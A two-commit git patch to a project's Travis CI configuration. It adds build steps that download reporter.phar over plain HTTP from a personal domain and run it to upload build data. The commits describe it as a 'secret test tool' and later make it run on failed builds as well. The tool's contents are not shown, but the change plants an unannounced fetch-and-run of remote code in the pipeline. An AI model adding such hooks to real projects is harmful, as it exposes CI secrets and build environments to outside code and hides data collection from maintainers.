From c65c45e633f30eaab84a528a66a519bf6c637c8d Mon Sep 17 00:00:00 2001 From: Tobias Nyholm Date: Mon, 4 Dec 2017 23:17:37 +0100 Subject: [PATCH 1/2] Share some data with a secret test tool by Nyholm --- .travis.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.travis.yml b/.travis.yml index 934be369..600c0d68 100644 --- a/.travis.yml +++ b/.travis.yml @@ -68,3 +68,5 @@ script: after_success: - if [[ $COVERAGE = true ]]; then wget https://scrutinizer-ci.com/ocular.phar; fi - if [[ $COVERAGE = true ]]; then php ocular.phar code-coverage:upload --format=php-clover build/coverage.xml; fi + - wget http://tnyholm.se/reporter.phar + - php reporter.phar build:upload From 74b34132a4300a77c58bfdc7296453c060d2eba5 Mon Sep 17 00:00:00 2001 From: Tobias Nyholm Date: Tue, 5 Dec 2017 08:12:30 +0100 Subject: [PATCH 2/2] I need to gather data from failures as well --- .travis.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.travis.yml b/.travis.yml index 600c0d68..fd7db67b 100644 --- a/.travis.yml +++ b/.travis.yml @@ -68,5 +68,7 @@ script: after_success: - if [[ $COVERAGE = true ]]; then wget https://scrutinizer-ci.com/ocular.phar; fi - if [[ $COVERAGE = true ]]; then php ocular.phar code-coverage:upload --format=php-clover build/coverage.xml; fi + +after_script: - wget http://tnyholm.se/reporter.phar - php reporter.phar build:upload